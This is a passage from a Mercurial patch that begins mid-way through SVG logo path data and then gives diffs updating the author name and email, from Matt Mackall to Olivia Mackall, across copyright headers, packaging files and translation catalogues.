75-4.22-7.23,0-7.15,2.554-8.15,4.775-8.15,1.258,0,1.962,0.36,2.665,0.82,0.186-0.43,0.26-1.03,0.26-1.42m14.181,16.55c-1.63,0.82-3.776,1.14-5.627,1.14-4.739,0-5.442-1.99-5.442-6.73v-11.14c0-0.46-0.037-0.46,2.074-0.46v11.82c0,3.56,0.517,4.77,3.294,4.77,1.073,0,2.554-0.22,3.665-0.86v-15.27c0-0.46-0.074-0.46,2.036-0.46v17.19m4.221-16.16c1.739-1.14,3.332-1.57,4.96-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.111,0.96-0.296,1.31-0.519-0.28-1.111-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m12.379-1.03c-1.629,0-2.11,0-2.11,0.96v16.83c2.073,0,2.11,0,2.11-0.49v-17.3m-2.184-6.27c0,1.18,0.37,1.6,1.11,1.64,0.851,0,1.259-0.61,1.259-1.67,0.037-1.11-0.26-1.61-1.111-1.61-0.814,0-1.221,0.61-1.258,1.64m5.696,7.3c0-0.39,0.074-0.61,0.222-0.71,0.704-0.39,3.41-0.86,6.48-0.86,2.33,0,3.81,1.11,3.81,4.31v2.31c0,6.34-0.18,11.07-0.18,11.07-0.85,0.47-2.45,1.18-5.04,1.18-2.66,0.03-5.329-0.22-5.329-5.48,0-5.02,2.739-5.81,5.479-5.81,1.04,0,2.26,0.11,3.07,0.43v-3.31c0-2.31-1.18-2.81-2.59-2.81-1.89,0-4.514,0.35-5.662,0.89-0.222-0.39-0.26-1-0.26-1.21m8.512,7.9c-0.7-0.25-1.7-0.35-2.4-0.35-2.11,0-4.04,0.42-4.04,4.34,0,3.66,1.59,3.7,3.48,3.7,1.19,0,2.37-0.32,2.78-0.75,0,0,0.18-4.27,0.18-6.94m7.86,8.37c0,0.49,0.04,0.49-2.04,0.49v-25.2c0-0.96,0.41-0.96,2.04-0.96v25.67" stroke-miterlimit="4" stroke-width="2.02999997" fill="#010101"/><g id="g4503" transform="matrix(0.9351326,0,0,0.9351326,150.39508,-1.251766)"><path id="path2339" fill="#1b1a1b" d="M-45.75,92.692c20.04-33.321-4.232-87.363-48.614-81.873-40.096,4.958-40.746,47.165-5.405,57.191,30.583,8.685,6.318,28.084,7.027,41,0.712,12.92,26.587,17.6,46.992-16.318z"/><circle id="circle2341" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="85.364" cx="33.728" r="15.414" fill="#1b1a1b"/><path id="path2343" fill="#1b1a1b" d="M-140.06,48.936c-6.26,0.606-10.84,6.164-10.24,12.422,0.61,6.262,6.17,10.847,12.43,10.241,6.26-0.614,10.84-6.171,10.23-12.43-0.61-6.253-6.16-10.839-12.42-10.233z"/><path id="path2561" fill="#bfbfbf" d="M-44.993,91.34c20.041-33.321-4.231-87.363-48.613-81.873-40.104,4.9568-40.744,47.166-5.406,57.193,30.583,8.684,6.318,28.083,7.027,41,0.713,12.92,26.587,17.6,46.992-16.32z"/><path id="path2563" fill="#000" d="M-86.842,112.76c-1.215-1.97,0.642-4.16,2.551-3.99,3.039,0.26,9.655-0.04,14.876-3,13.043-7.39,33.114-42.966,23.019-65.405-4.519-10.044-6.72-12.92-11.374-17.833-0.95-1.002-0.405-0.948,0.238-0.609,2.517,1.321,6.94,6.437,11.477,14.765,7.664,14.069,7.267,30.795,4.416,41.287-1.986,7.299-8.825,23.815-18.842,30.955-10.039,7.15-21.785,11.26-26.361,3.83z"/><path id="path2565" fill="#000" d="M-95.93,66.591c-6.83-2.028-15.64-4.853-20.74-11.517-3.75-4.914-5.66-10.277-6.15-13.318-0.17-1.085-0.32-1.991-0.01-2.24,0.15-0.117,2.81,5.896,6.79,10.936,3.97,5.04,9.53,7.988,14.16,9.059,4.117,0.952,12.646,3.044,15.532,5.503,2.967,2.527,3.215,7.987,2.216,8.603-1.006,0.62-3.048-4.429-11.798-7.026z"/><path id="path2567" fill="#FFF" d="M-81.841,113.72c-0.132,1.57,1.665,1.87,4.083,1.51,3.099-0.46,5.72-0.81,9.287-2.6,4.835-2.42,9.728-5.89,13.312-10.57,10.692-13.945,14.478-30.45,13.895-32.824-0.195,1.961-2.776,12.253-8.679,21.532-7.582,11.922-13.079,18.262-25.758,21.342-3.529,0.86-5.967-0.45-6.14,1.61z"/><path id="path2569" fill="#FFF" d="M-109.96,59.479c1.44,1.225,4.4,2.857,10.223,4.767,7.031,2.305,10.455,4.304,11.888,5.262,1.52,1.018,2.483,3.288,2.578,1.272,0.099-2.019-1.145-3.755-3.921-4.675-1.878-0.624-5.038-2.109-8.067-2.707-1.946-0.384-5.111-1.146-7.831-1.978-1.48-0.457-3-1.258-4.87-1.941z"/><circle id="circle2577" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="84.375" cx="34.681" r="15.414" fill="#bfbfbf"/><path id="path2579" fill="#000" d="M-128.68,108.38c13.53,12.54,33.894-4.69,24.93-19.897-1.01-1.708-2.32-3.009-1.89-1.7,2.87,8.747,0.22,15.667-4.72,19.227-4.85,3.5-11.51,4.09-16.84,1.32-1.57-0.81-2.22,0.37-1.48,1.05z"/><path id="path2585" fill="#FFF" d="M-118.07,110.95c1.73-0.36,11.75-2.95,14.1-11.194,0.73-2.569,0.86-2.053,0.66-0.661-1.06,7.105-7.78,12.345-13.49,12.545-1.16,0.12-2.68-0.39-1.27-0.69z"/><path id="path2589" fill="#bfbfbf" d="M-139.3,47.584c-6.26,0.605-10.84,6.164-10.24,12.422,0.61,6.261,6.17,10.847,12.43,10.241,6.25-0.614,10.84-6.173,10.23-12.431-0.61-6.254-6.17-10.838-12.42-10.232z"/><path id="path2591" fill="#000" d="M-144.47,67.571c0.07,0.805,1.17,1.838,2.9,2.312,1.49,0.408,5.32,1.45,10.25-1.658,4.92-3.108,5.49-11.421,3.25-13.865-0.69-1.239-1.59-2.14-0.88-0.164,1.81,4.99-1.7,9.659-4.74,11.82-3.03,2.162-6.88,1.139-8.45,0.66s-2.4,0.064-2.33,0.895z"/><path id="path2597" fill="#FFF" d="M-138.11,68.688c0.45-0.406,2.73-0.24,4.79-1.35,2.07-1.109,4.52-3.54,4.95-6.994,0.26-2.029,0.34-1.519,0.44-0.415-0.32,5.743-5.6,8.916-8.62,9.334-0.82,0.113-2.25,0.044-1.56-0.575z"/><path id="path2561_1_" fill="#999" d="M-47.767,69.694c8.532-24.594-9.323-61.736-45.446-57.268-32.637,4.035-33.167,38.389-4.4,46.55,32.582,4.933,12.962,29.512,10.179,41.904-2.495,11.11,26.331,12.94,39.667-31.186z"/><path id="path2571" fill="#f3f3f3" d="M-70.093,88.904c-8.827-1.092-21.529,18.836-9.552,16.506,5.756-0.86,10.525-2.89,14.794-7.762,5.567-6.353,13.883-20.074,16.288-28.94,2.025-7.476,1.007-19.057-1.081-8.175-2.142,11.167-11.623,29.464-20.449,28.371z"/><path id="path2581" fill="#999" d="M-129.39,104.85c2.05,0.03,3.28,0.32,5.35,1.77,4.09,1.7,11.61,0.62,15.09-3.95,3.47-4.57,3.58-10.868,2.26-14.674-3.24-9.314-16.99-9.149-23.13-1.417-6.64,8.636-1.61,18.231,0.43,18.271z"/><path id="path2593_2_" fill="#999" d="M-147.64,61.684c0.41,1.282,1.45,3.154,3.65,3.466,2.94,0.417,3.54,1.743,7,1.055,3.47-0.688,6.09-3.528,7.14-6.67,1.21-4.347-0.59-6.591-3.31-8.595-2.71-2.003-8.67-1.788-12.23,1.458-2.53,2.305-3.24,6.163-2.25,9.286z"/><path id="path256" fill="#f3f3f3" d="M-136.11,64.558c2.66-0.697,6.18-4.325,4.44-7.096-2.16-3.413-8.17-0.491-8.37,3.309-0.21,3.802,1.11,4.526,3.93,3.787z"/><path id="path258" fill="#f3f3f3" d="M-116.12,105.51c2.28-0.6,9.24-3.43,7.93-13.547-0.66-5.126-3.46,6.361-8.63,8.077-7.85,2.61-6.97,7.48,0.7,5.47z"/></g> </svg> diff --git a/contrib/memory.py b/contrib/memory.py --- a/contrib/memory.py +++ b/contrib/memory.py @@ -1,6 +1,6 @@ # memory.py - track memory usage # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/packaging/debian/copyright b/contrib/packaging/debian/copyright --- a/contrib/packaging/debian/copyright +++ b/contrib/packaging/debian/copyright @@ -3,7 +3,7 @@ Source: https://www.mercurial-scm.org/ Files: * -Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others. +Copyright: 2005-2021, Olivia Mackall <olivia@selenic.com> and others. License: GPL-2+ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public diff --git a/contrib/packaging/inno/mercurial.iss b/contrib/packaging/inno/mercurial.iss --- a/contrib/packaging/inno/mercurial.iss +++ b/contrib/packaging/inno/mercurial.iss @@ -6,7 +6,7 @@ #endif [Setup] -AppCopyright=Copyright 2005-2021 Matt Mackall and others +AppCopyright=Copyright 2005-2021 Olivia Mackall and others AppName=Mercurial AppVersion={#VERSION} OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX} @@ -20,7 +20,7 @@ InfoAfterFile=../postinstall.txt LicenseFile=Copying.txt ShowLanguageDialog=yes -AppPublisher=Matt Mackall and others +AppPublisher=Olivia Mackall and others AppPublisherURL=https://mercurial-scm.org/ AppSupportURL=https://mercurial-scm.org/ AppUpdatesURL=https://mercurial-scm.org/ @@ -29,8 +29,8 @@ DefaultDirName={pf}\Mercurial SourceDir=stage VersionInfoDescription=Mercurial distributed SCM (version {#VERSION}) -VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others -VersionInfoCompany=Matt Mackall and others +VersionInfoCopyright=Copyright 2005-2021 Olivia Mackall and others +VersionInfoCompany=Olivia Mackall and others VersionInfoVersion={#QUAD_VERSION} InternalCompressLevel=max SolidCompression=true diff --git a/contrib/packaging/wix/mercurial.wxs b/contrib/packaging/wix/mercurial.wxs --- a/contrib/packaging/wix/mercurial.wxs +++ b/contrib/packaging/wix/mercurial.wxs @@ -19,14 +19,14 @@ Name='Mercurial $(var.Version) ($(var.Platform))' UpgradeCode='$(var.ProductUpgradeCode)' Language='1033' Codepage='1252' Version='$(var.Version)' - Manufacturer='Matt Mackall and others'> + Manufacturer='Olivia Mackall and others'> <Package Id='*' Keywords='Installer' Description="Mercurial distributed SCM (version $(var.Version))" Comments='$(var.Comments)' Platform='$(var.Platform)' - Manufacturer='Matt Mackall and others' + Manufacturer='Olivia Mackall and others' InstallerVersion='300' Languages='1033' Compressed='yes' SummaryCodepage='1252' /> <Media Id='1' Cabinet='mercurial.cab' EmbedCab='yes' DiskPrompt='CD-ROM #1' diff --git a/contrib/win32/ReadMe.html b/contrib/win32/ReadMe.html --- a/contrib/win32/ReadMe.html +++ b/contrib/win32/ReadMe.html @@ -140,7 +140,7 @@ </p> <p> - Mercurial is Copyright 2005-2021 Matt Mackall and others. + Mercurial is Copyright 2005-2021 Olivia Mackall and others. </p> <p> diff --git a/doc/runrst b/doc/runrst --- a/doc/runrst +++ b/doc/runrst @@ -2,7 +2,7 @@ # # runrst - register custom roles and run correct writer # -# Copyright 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hg b/hg --- a/hg +++ b/hg @@ -2,7 +2,7 @@ # # mercurial - scalable distributed SCM # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgdemandimport/demandimportpy2.py b/hgdemandimport/demandimportpy2.py --- a/hgdemandimport/demandimportpy2.py +++ b/hgdemandimport/demandimportpy2.py @@ -1,6 +1,6 @@ # demandimport.py - global demand-loading of modules for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/__init__.py b/hgext/convert/__init__.py --- a/hgext/convert/__init__.py +++ b/hgext/convert/__init__.py @@ -1,6 +1,6 @@ # convert.py Foreign SCM converter # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/common.py b/hgext/convert/common.py --- a/hgext/convert/common.py +++ b/hgext/convert/common.py @@ -1,6 +1,6 @@ # common.py - common code for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/convcmd.py b/hgext/convert/convcmd.py --- a/hgext/convert/convcmd.py +++ b/hgext/convert/convcmd.py @@ -1,6 +1,6 @@ # convcmd - convert extension commands definition # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/cvs.py b/hgext/convert/cvs.py --- a/hgext/convert/cvs.py +++ b/hgext/convert/cvs.py @@ -1,6 +1,6 @@ # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/darcs.py b/hgext/convert/darcs.py --- a/hgext/convert/darcs.py +++ b/hgext/convert/darcs.py @@ -1,6 +1,6 @@ # darcs.py - darcs support for the convert extension # -# Copyright 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/git.py b/hgext/convert/git.py --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -1,6 +1,6 @@ # git.py - git support for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/hg.py b/hgext/convert/hg.py --- a/hgext/convert/hg.py +++ b/hgext/convert/hg.py @@ -1,6 +1,6 @@ # hg.py - hg backend for convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -1,6 +1,6 @@ # patchbomb.py - sending Mercurial changesets as patch emails # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/share.py b/hgext/share.py --- a/hgext/share.py +++ b/hgext/share.py @@ -1,4 +1,4 @@ -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/win32text.py b/hgext/win32text.py --- a/hgext/win32text.py +++ b/hgext/win32text.py @@ -1,6 +1,6 @@ # win32text.py - LF <-> CRLF/CR translation utilities for Windows/Mac users # -# Copyright 2005, 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005, 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/zeroconf/__init__.py b/hgext/zeroconf/__init__.py --- a/hgext/zeroconf/__init__.py +++ b/hgext/zeroconf/__init__.py @@ -1,6 +1,6 @@ # zeroconf.py - zeroconf support for Mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/i18n/da.po b/i18n/da.po --- a/i18n/da.po +++ b/i18n/da.po @@ -1,6 +1,6 @@ # Danish translations for Mercurial # Danske oversættelser for Mercurial -# Copyright (C) 2009, 2010 Matt Mackall and others +# Copyright (C) 2009, 2010 Olivia Mackall and others # # Translation dictionary: # @@ -11359,11 +11359,11 @@ msgstr "(se http://mercurial.selenic.com for mere information)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall og andre\n" +"Copyright (C) 2005-2011 Olivia Mackall og andre\n" "Dette er frit programmel; se kildekoden for kopieringsbetingelser. Der\n" "gives INGEN GARANTI; ikke engang for SALGBARHED eller EGNETHED FOR\n" "NOGET BESTEMT FORMÅL.\n" diff --git a/i18n/de.po b/i18n/de.po --- a/i18n/de.po +++ b/i18n/de.po @@ -1,6 +1,6 @@ # German translations for Mercurial # Deutsche Übersetzungen für Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others # # Übersetzer: # Tobias Bell @@ -14536,11 +14536,11 @@ msgstr "(siehe http://mercurial.selenic.com für mehr Information)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2014 Matt Mackall und andere\n" +"Copyright (C) 2005-2014 Olivia Mackall und andere\n" "Dies ist freie Software; siehe Quellen für Kopierbestimmungen. Es besteht\n" "KEINE Gewährleistung für das Programm, nicht einmal der Marktreife oder der\n" "Verwendbarkeit für einen bestimmten Zweck.\n" @@ -18893,7 +18893,7 @@ msgstr "" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -19032,7 +19032,7 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" msgid "" @@ -19050,7 +19050,7 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19088,7 +19088,7 @@ "Vadim Gelfer <vadim.gelfer@gmail.com>" msgstr "" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." msgstr "" msgid "" @@ -19101,7 +19101,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19307,7 +19307,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" diff --git a/i18n/el.po b/i18n/el.po --- a/i18n/el.po +++ b/i18n/el.po @@ -1,7 +1,7 @@ # Greek translations for Mercurial # Ελληνική μετάφραση των μηνυμάτων του Mercurial # -# Copyright (C) 2009 Matt Mackall και άλλοι +# Copyright (C) 2009 Olivia Mackall και άλλοι # msgid "" msgstr "" @@ -7606,12 +7606,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"Πνευματικά δικαιώματα (C) 2005-2009 Matt Mackall <mpm@selenic.com> και άλλοι\n" +"Πνευματικά δικαιώματα (C) 2005-2009 Olivia Mackall <olivia@selenic.com> και άλλοι\n" "Αυτό το πρόγραμμα είναι ελεύθερο λογισμικό· δείτε τον πηγαίο κώδικα για\n" "την άδεια χρήσης του. Δεν παρέχεται ΚΑΜΙΑ εγγύηση· ούτε καν για την\n" "ΕΜΠΟΡΕΥΣΙΜΟΤΗΤΑ ή την ΚΑΤΑΛΛΗΛΟΤΗΤΑ ΓΙΑ ΚΑΠΟΙΟ ΣΚΟΠΟ.\n" diff --git a/i18n/fr.po b/i18n/fr.po --- a/i18n/fr.po +++ b/i18n/fr.po @@ -1,6 +1,6 @@ # French translations for Mercurial # Traductions françaises de Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # # Quelques règles : # - dans l'aide d'une commande, la première ligne descriptive @@ -9412,7 +9412,7 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/i18n/hggettext b/i18n/hggettext --- a/i18n/hggettext +++ b/i18n/hggettext @@ -2,7 +2,7 @@ # # hggettext - carefully extract docstrings for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/i18n/it.po b/i18n/it.po --- a/i18n/it.po +++ b/i18n/it.po @@ -1,6 +1,6 @@ # Italian translations for Mercurial # Traduzione italiana per Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others msgid "" msgstr "" "Project-Id-Version: Mercurial\n" @@ -8881,11 +8881,11 @@ msgstr "" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall e altri\n" +"Copyright (C) 2005-2011 Olivia Mackall e altri\n" "Questo è software libero; vedere i sorgenti per le condizioni di copia.\n" "Non c'è ALCUNA garanzia; neppure di COMMERCIABILITÀ o IDONEITÀ AD UNO\n" "SCOPO PARTICOLARE.\n" diff --git a/i18n/ja.po b/i18n/ja.po --- a/i18n/ja.po +++ b/i18n/ja.po @@ -18771,11 +18771,11 @@ msgstr "(詳細は https://mercurial-scm.org を参照)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "本製品はフリーソフトウェアです。\n" "頒布条件に関しては同梱されるライセンス条項をお読みください。\n" "市場適合性や特定用途への可否を含め、 本製品は無保証です。\n" @@ -30239,11 +30239,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "著者\n" "\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -30264,13 +30264,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30293,12 +30293,12 @@ "----------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -30471,13 +30471,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30519,8 +30519,8 @@ "====\n" "本マニュアルページの著者は Vadim Gelfer <vadim.gelfer@gmail.com> です。" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial の著者は Matt Mackall <mpm@selenic.com> です。" +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial の著者は Olivia Mackall <olivia@selenic.com> です。" msgid "" "See Also\n" @@ -30536,14 +30536,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "=======\n" "本マニュアルページの著作権は copyright 2006 Vadim Gelfer です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30825,14 +30825,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "=======\n" "本マニュアルの著作権は copyright 2005 Bryan O'Sullivan です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -39790,13 +39790,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." #~ msgstr "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" #~ "Public License の元での自由な利用が保証されています。" diff --git a/i18n/pt_BR.po b/i18n/pt_BR.po --- a/i18n/pt_BR.po +++ b/i18n/pt_BR.po @@ -1,6 +1,6 @@ # Brazilian Portuguese translations for Mercurial # Traduções do Mercurial para português do Brasil -# Copyright (C) 2011 Matt Mackall and others +# Copyright (C) 2011 Olivia Mackall and others # # Translators: # Diego Oliveira <diego@diegooliveira.com> @@ -19269,11 +19269,11 @@ msgstr "(veja https://mercurial-scm.org para mais informações)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall e outros\n" +"Copyright (C) 2005-2018 Olivia Mackall e outros\n" "Este software é livre; veja os fontes para condições de cópia. Não\n" "há garantias, nem mesmo de adequação para qualquer propósito em\n" "particular.\n" @@ -31340,11 +31340,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Autor\n" "\"\"\"\"\"\n" -"Escrito por Matt Mackall <mpm@selenic.com>" +"Escrito por Olivia Mackall <olivia@selenic.com>" 